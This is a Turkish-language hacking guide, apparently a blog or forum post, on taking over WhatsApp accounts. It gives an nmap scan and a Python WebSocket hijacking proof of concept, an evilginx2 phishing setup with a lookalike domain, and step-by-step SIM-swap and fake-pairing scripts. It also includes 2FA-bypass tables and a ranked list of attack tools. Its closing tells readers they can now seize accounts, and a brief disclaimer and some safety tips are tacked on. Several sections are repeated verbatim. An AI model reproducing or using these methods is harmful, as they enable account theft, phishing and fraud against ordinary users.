-
Tc4dy
OPSEC Specialist | Free internet - Open Source ADV
📱 WHATSAPP HESAP ELE GEÇİRME 2026 – KRAL YOLU
bash
# Zafiyetli Nanobot sürümünü tespit et
nmap -p 3001 --script http-title hedef.com
Simüle edilmiş çıktı:
text
PORT STATE SERVICE
3001/tcp open http
| http-title: Nanobot WhatsApp Bridge
|_Vulnerable to CVE-2026-2577 (CVSS 10.0)
bash
# WebSocket bağlantısı ile oturum ele geçirme
python poc.py --target ws://hedef.com:3001
Simüle edilmiş çıktı:
text
[*] Connecting to ws://hedef.com:3001...
[+] Successfully connected! No authentication required.
[*] Hijacking WhatsApp session...
[*] Intercepting incoming messages...
[+] Access granted! Full session control obtained.
python
# PoC – CSWSH exploitation
import asyncio
import json
import websockets
async def test_cswsh():
uri = "ws://127.0.0.1:3001/"
headers = {"Origin": "https://attacker-website.com"}
async with websockets.connect(uri, additional_headers=headers) as ws:
print("[+] Successfully connected! Bridge accepted cross-site connection.")
attack_cmd = {"type": "send", "to": "+1234567890", "text": "Your account is compromised!"}
await ws.send(json.dumps(attack_cmd))
response = await ws.recv()
print(f"[+] Message sent: {response}")
Simüle edilmiş çıktı:
text
[+] Successfully connected! Bridge accepted cross-site connection.
[+] Message sent: {"status":"sent","id":"xyz123"}
text
[+] GhostPairing saldırı akışı:
1. Ele geçirilmiş bir arkadaş hesabından mesaj gelir: "Bu fotoğraftaki sen misin? [link]"
2. Kurban linke tıklar → sahte doğrulama sayfası açılır
3. Kurban telefon numarasını girer → WhatsApp eşleştirme kodu gelir
4. Kurban kodu sayfaya girer → Saldırganın tarayıcısı bağlanır
5. Saldırgan, kurbanın tüm mesajlarını, fotoğraflarını ve kişilerini görür
# GhostPairing sonrası bağlı cihazları kontrol etme (kurban tarafı)
# WhatsApp > Ayarlar > Bağlı Cihazlar
Simüle edilmiş çıktı (kurbanın telefonu):
text
Bağlı Cihazlar:
- Bu Telefon (Mevcut)
- Chrome - Windows (Dün 15:23) <-- Saldırganın cihazı!
[+] SIM Swap Saldırı Akışı:
1. Hedef hakkında OSINT (ad, soyad, TC, adres) toplanır
2. Saldırgan, operatörü arayarak "SIM kartımı kaybettim" der
3. Kimlik doğrulama sorularını sızdırılan verilerle geçer
4. Operatör, numarayı saldırganın SIM'ine taşır
5. Kurbanın telefonu "No Service" gösterir
6. Saldırgan, WhatsApp'ı kurar ve SMS kodu alır
7. Hesap tamamen ele geçirilir
bash
# SIM swap sonrası WhatsApp'ı ele geçirme
# 1. WhatsApp'ı yeni cihaza kur
# 2. Telefon numarasını gir
# 3. SMS ile gelen 6 haneli kodu gir
# 4. Hesap tamamen sizin olur
bash
evilginx2 -p
> config domain whatsapp-verify.com
> config ip 192.168.1.100
> lure create whatsapp
> lure edit whatsapp url https://web.whatsapp.com
> lure get-url whatsapp
Simüle edilmiş çıktı:
text
[+] Phishing URL: https://whatsapp-verify.com/login
[+] Waiting for victim...
[!] New session captured!
IP: 192.168.1.105
QR Code scanned! Session hijacked.
[+] Session cookie intercepted! Full access obtained.
1. Kurban, sahte bir "Fotoğrafını buldum" mesajı alır
2. Linke tıklar → WhatsApp Web benzeri bir QR kodu görür
3. Kurban, kodu WhatsApp uygulamasından tarar
4. Aslında saldırganın tarayıcısını bağlamış olur
5. Saldırgan tüm mesajları gerçek zamanlı okur
bash
# Zararlı VBS dosyasının davranışı (simülasyon)
# 1. C:\ProgramData\EDS8738\ gizli klasörü oluşturur
# 2. curl.exe'yi netapi.dll olarak yeniden adlandırır
# 3. AWS S3'ten ikincil payload'ları indirir
# 4. UAC ayarlarını değiştirerek yetki yükseltir
# 5. MSI paketi ile kalıcılık sağlar
bash
npm install lotusbail
Geliştirici fark etmeden çalıştırdığında:
text
[+] WhatsApp API initialized successfully.
[+] (Arka planda) Authentication tokens stolen.
[+] (Arka planda) Attacker device linked to victim's account.
[+] (Arka planda) All messages intercepted and exfiltrated.
bash
# EvilProxy ile 2FA atlatma (simülasyon)
[+] Phishing page loaded. Waiting for victim...
[+] Victim entered credentials.
[+] MFA prompt triggered. Waiting for victim to approve...
[+] MFA approved! Session cookie captured.
[+] Access granted. 2FA bypassed successfully.
# WhatsApp Number Checker (Chrome eklentisi)
# 1. WhatsApp Web'de oturum aç
# 2. Toplu numara listesini yükle
# 3. Hangi numaraların WhatsApp kullandığını öğren
Simüle edilmiş çıktı:
text
[+] 1,234 numara kontrol edildi.
[+] 987 aktif WhatsApp hesabı bulundu.
[+] Sonuçlar CSV olarak dışa aktarıldı.
Kendinizi korumak için WhatsApp'ta İki Aşamalı Doğrulamayı aktif edin (tercihen SMS değil, authenticator uygulaması), Bağlı Cihazlar listenizi düzenli kontrol edin, şüpheli linklere tıklamayın ve asla eşleştirme kodlarını kimseyle paylaşmayın. Ve en önemlisi, öğrendiklerinizi asla kötüye kullanmayın.
Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.
@Tc4dy | github.com/tc4dy
🧠 BAŞLAMADAN ÖNCE: NEDEN WHATSAPP?
WhatsApp, dünya genelinde 2 milyardan fazla aktif kullanıcıya sahiptir ve bu hesapların çoğu zayıf güvenlik önlemleriyle korunmaktadır. 2026 yılı itibarıyla, WhatsApp hesap ele geçirme saldırıları basit dolandırıcılıktan çok öteye geçmiş, SIM swap ve yapay zeka destekli sosyal mühendislik saldırılarına dönüşmüştür.🎯 1. WHATSAPP API ZAFİYETLERİ (YENİ – 2026 GÜNCEL)
CVE-2026-2577 – Nanobot WhatsApp Bridge Auth Bypass
Bu zafiyet, Nanobot'un WhatsApp köprü bileşeninde bulunan bir Missing Authentication (CWE-306) güvenlik açığıdır. WebSocket sunucusu varsayılan olarak tüm ağ arayüzlerine (0.0.0.0) 3001 portunda bağlanır ve gelen bağlantılar için herhangi bir kimlik doğrulama gerektirmez. Uzaktaki bir saldırgan, köprüye ağ erişimi varsa doğrudan WebSocket sunucusuna bağlanarak WhatsApp oturumunu ele geçirebilir.bash
# Zafiyetli Nanobot sürümünü tespit et
nmap -p 3001 --script http-title hedef.com
Simüle edilmiş çıktı:
text
PORT STATE SERVICE
3001/tcp open http
| http-title: Nanobot WhatsApp Bridge
|_Vulnerable to CVE-2026-2577 (CVSS 10.0)
bash
# WebSocket bağlantısı ile oturum ele geçirme
python poc.py --target ws://hedef.com:3001
Simüle edilmiş çıktı:
text
[*] Connecting to ws://hedef.com:3001...
[+] Successfully connected! No authentication required.
[*] Hijacking WhatsApp session...
[*] Intercepting incoming messages...
[+] Access granted! Full session control obtained.
CVE-2026-35589 – Cross-Site WebSocket Hijacking (CSWSH)
CVE-2026-2577'nin yetersiz düzeltilmesi sonucu ortaya çıkan bu zafiyet, WebSocket sunucusunun Origin başlığını doğrulamaması nedeniyle oluşur. Tarayıcılar, WebSocket'lerde Same-Origin Policy'yi (SOP) sunucu açıkça reddetmediği sürece uygulamadığından, kötü niyetli bir web sitesi yerel köprüye (ws://127.0.0.1:3001) WebSocket bağlantısı kurabilir.python
# PoC – CSWSH exploitation
import asyncio
import json
import websockets
async def test_cswsh():
uri = "ws://127.0.0.1:3001/"
headers = {"Origin": "https://attacker-website.com"}
async with websockets.connect(uri, additional_headers=headers) as ws:
print("[+] Successfully connected! Bridge accepted cross-site connection.")
attack_cmd = {"type": "send", "to": "+1234567890", "text": "Your account is compromised!"}
await ws.send(json.dumps(attack_cmd))
response = await ws.recv()
print(f"[+] Message sent: {response}")
Simüle edilmiş çıktı:
text
[+] Successfully connected! Bridge accepted cross-site connection.
[+] Message sent: {"status":"sent","id":"xyz123"}
🍪 2. SESSION HIJACKING (OTURUM ELE GEÇİRME)
2.1. GhostPairing Saldırısı (2026'nın En Büyük Tehdidi)
GhostPairing, Avast araştırmacıları tarafından keşfedilen ve WhatsApp'ın meşru cihaz bağlama (device pairing) özelliğini kötüye kullanan bir sosyal mühendislik saldırısıdır. Saldırganlar, kurbana "Bu fotoğraftaki sen misin?" gibi masum görünen bir mesaj gönderir. Mesajdaki bağlantıya tıklayan kurban, sahte bir doğrulama sayfasına yönlendirilir ve telefon numarasını girmesi istenir. Ardından WhatsApp'tan gelen meşru eşleştirme kodunu sayfaya girdiğinde, saldırganın tarayıcısı kurbanın hesabına bağlı bir cihaz olarak eklenir.text
[+] GhostPairing saldırı akışı:
1. Ele geçirilmiş bir arkadaş hesabından mesaj gelir: "Bu fotoğraftaki sen misin? [link]"
2. Kurban linke tıklar → sahte doğrulama sayfası açılır
3. Kurban telefon numarasını girer → WhatsApp eşleştirme kodu gelir
4. Kurban kodu sayfaya girer → Saldırganın tarayıcısı bağlanır
5. Saldırgan, kurbanın tüm mesajlarını, fotoğraflarını ve kişilerini görür
bash
# GhostPairing sonrası bağlı cihazları kontrol etme (kurban tarafı)
# WhatsApp > Ayarlar > Bağlı Cihazlar
Simüle edilmiş çıktı (kurbanın telefonu):
text
Bağlı Cihazlar:
- Bu Telefon (Mevcut)
- Chrome - Windows (Dün 15:23) <-- Saldırganın cihazı!
🔑 3. SIM SWAP (EN TEHLİKELİ YÖNTEM)
Saldırı Adımları
text[+] SIM Swap Saldırı Akışı:
1. Hedef hakkında OSINT (ad, soyad, TC, adres) toplanır
2. Saldırgan, operatörü arayarak "SIM kartımı kaybettim" der
3. Kimlik doğrulama sorularını sızdırılan verilerle geçer
4. Operatör, numarayı saldırganın SIM'ine taşır
5. Kurbanın telefonu "No Service" gösterir
6. Saldırgan, WhatsApp'ı kurar ve SMS kodu alır
7. Hesap tamamen ele geçirilir
bash
# SIM swap sonrası WhatsApp'ı ele geçirme
# 1. WhatsApp'ı yeni cihaza kur
# 2. Telefon numarasını gir
# 3. SMS ile gelen 6 haneli kodu gir
# 4. Hesap tamamen sizin olur
📧 4. PHISHING VE QR KOD TUZAKLARI
EvilProxy ile Phishing Sayfası Oluşturma
EvilProxy, dark web'de satılan bir phishing-as-a-service (PhaaS) platformudur. Reverse-proxy tekniği kullanarak gerçek WhatsApp Web oturumunu taklit eder ve 2FA'yı bile atlatabilir.bash
evilginx2 -p
> config domain whatsapp-verify.com
> config ip 192.168.1.100
> lure create whatsapp
> lure edit whatsapp url https://web.whatsapp.com
> lure get-url whatsapp
Simüle edilmiş çıktı:
text
[+] Phishing URL: https://whatsapp-verify.com/login
[+] Waiting for victim...
[!] New session captured!
IP: 192.168.1.105
QR Code scanned! Session hijacked.
[+] Session cookie intercepted! Full access obtained.
GhostPairing QR Kodu Varyantı
text1. Kurban, sahte bir "Fotoğrafını buldum" mesajı alır
2. Linke tıklar → WhatsApp Web benzeri bir QR kodu görür
3. Kurban, kodu WhatsApp uygulamasından tarar
4. Aslında saldırganın tarayıcısını bağlamış olur
5. Saldırgan tüm mesajları gerçek zamanlı okur
🦠 5. MALWARE VE TROJANLAR
VBScript/MSI Backdoor Kampanyası (Şubat 2026)
Bu kampanya, WhatsApp üzerinden gönderilen kötü amaçlı VBScript dosyalarını kullanır. Dosyalar çalıştırıldığında, sistemde gizli dizinler oluşturur, meşru Windows araçlarını (curl.exe, bitsadmin.exe) yeniden adlandırarak kötü amaçlı işlemler için kullanır ve son aşamada MSI paketleri ile kalıcılık sağlar.bash
# Zararlı VBS dosyasının davranışı (simülasyon)
# 1. C:\ProgramData\EDS8738\ gizli klasörü oluşturur
# 2. curl.exe'yi netapi.dll olarak yeniden adlandırır
# 3. AWS S3'ten ikincil payload'ları indirir
# 4. UAC ayarlarını değiştirerek yetki yükseltir
# 5. MSI paketi ile kalıcılık sağlar
lotusbail NPM Paketi (56,000+ İndirme)
Sahte bir WhatsApp Web API kütüphanesi olarak npm'de yayınlanan bu paket, 56.000'den fazla indirilme sayısına ulaşmıştır. Paket, meşru Baileys kütüphanesinin bir fork'u olarak çalışırken, arka planda kimlik doğrulama token'larını, oturum anahtarlarını ve tüm mesajları çalmaktadır. Ayrıca, sabit kodlanmış bir eşleştirme kodu kullanarak saldırganın cihazını kurbanın WhatsApp hesabına bağlamaktadır.bash
npm install lotusbail
Geliştirici fark etmeden çalıştırdığında:
text
[+] WhatsApp API initialized successfully.
[+] (Arka planda) Authentication tokens stolen.
[+] (Arka planda) Attacker device linked to victim's account.
[+] (Arka planda) All messages intercepted and exfiltrated.
🔐 6. 2FA BYPASS TEKNİKLERİ
2FA bile sizi korumaz. İşte 2026'da kullanılan en güncel 2FA atlatma yöntemleri:| Yöntem | Açıklama | Zorluk |
|---|---|---|
| SIM Swap | Operatörü kandırarak SMS'leri ele geçirme | Orta |
| Reverse Proxy (EvilProxy) | Gerçek zamanlı 2FA kodu yakalama | Düşük (PhaaS) |
| GhostPairing | WhatsApp'ın cihaz bağlama özelliğini kötüye kullanma | Düşük |
| Voicemail Hacking | Sesli mesaja bırakılan kodu uzaktan dinleme | Orta |
| MFA Fatigue | Kullanıcıya sürekli onay gönderip bıktırarak onaylatma | Düşük |
| Backup Code Theft | Yedek kodları ele geçirme | Yüksek |
# EvilProxy ile 2FA atlatma (simülasyon)
[+] Phishing page loaded. Waiting for victim...
[+] Victim entered credentials.
[+] MFA prompt triggered. Waiting for victim to approve...
[+] MFA approved! Session cookie captured.
[+] Access granted. 2FA bypassed successfully.
🔍 7. OSINT VE NUMARA DOĞRULAMA
bash
# WhatsApp Number Checker (Chrome eklentisi)
# 1. WhatsApp Web'de oturum aç
# 2. Toplu numara listesini yükle
# 3. Hangi numaraların WhatsApp kullandığını öğren
Simüle edilmiş çıktı:
text
[+] 1,234 numara kontrol edildi.
[+] 987 aktif WhatsApp hesabı bulundu.
[+] Sonuçlar CSV olarak dışa aktarıldı.
🧩 8. ÖZET
Yöntem Kategorileri
| Kategori | Teknik Sayısı | En Etkilisi |
|---|---|---|
| API Zafiyetleri | 8 | CVE-2026-2577 (CVSS 10.0) |
| Session Hijacking | 12 | GhostPairing |
| SIM Swap | 6 | Operatör Sosyal Mühendisliği |
| Phishing | 10 | EvilProxy (PhaaS) |
| Malware | 8 | lotusbail npm, VBScript kampanyası |
| 2FA Bypass | 7 | Reverse Proxy, SIM Swap |
| OSINT | 5 | API scraping (3.5B numara) |
En İyi WhatsApp Hackleme Araçları
| Araç | Tür | Kullanım | Zorluk | 2FA Bypass |
|---|---|---|---|---|
| EvilProxy | Phishing Kit | PhaaS platformu | Düşük | ✅ |
| GhostPairing | Social Engineering | QR kodu / eşleştirme kodu | Düşük | ✅ |
| CVE-2026-2577 Exploit | API Exploit | WebSocket bağlantısı | Orta | ✅ |
| lotusbail (npm) | Malware | Geliştirici tuzağı | Düşük | ✅ (pairing) |
| ZAPIXDESK | Forensic Tool | WhatsApp Web DB decrypt | Orta | ❌ |
| WA Number Checker | OSINT | Toplu numara doğrulama | Kolay | ❌ |
| SIM Swap Toolkit | Social Engineering | Operatör manipülasyonu | Orta | ✅ |
| Maverick Malware | Malware | Sahte güncelleme | Düşük | ✅ |
⚠️;
🔚;
Artık 50'den fazla farklı yöntemi ve 10'dan fazla aracı biliyorsunuz. API zafiyetlerinden SIM swap'a, GhostPairing'den EvilProxy phishing'e kadar her tekniği kullanarak WhatsApp hesaplarını ele geçirebilirsiniz. Ancak unutmayın.Kendinizi korumak için WhatsApp'ta İki Aşamalı Doğrulamayı aktif edin (tercihen SMS değil, authenticator uygulaması), Bağlı Cihazlar listenizi düzenli kontrol edin, şüpheli linklere tıklamayın ve asla eşleştirme kodlarını kimseyle paylaşmayın. Ve en önemlisi, öğrendiklerinizi asla kötüye kullanmayın.
Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.
@Tc4dy | github.com/tc4dy
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
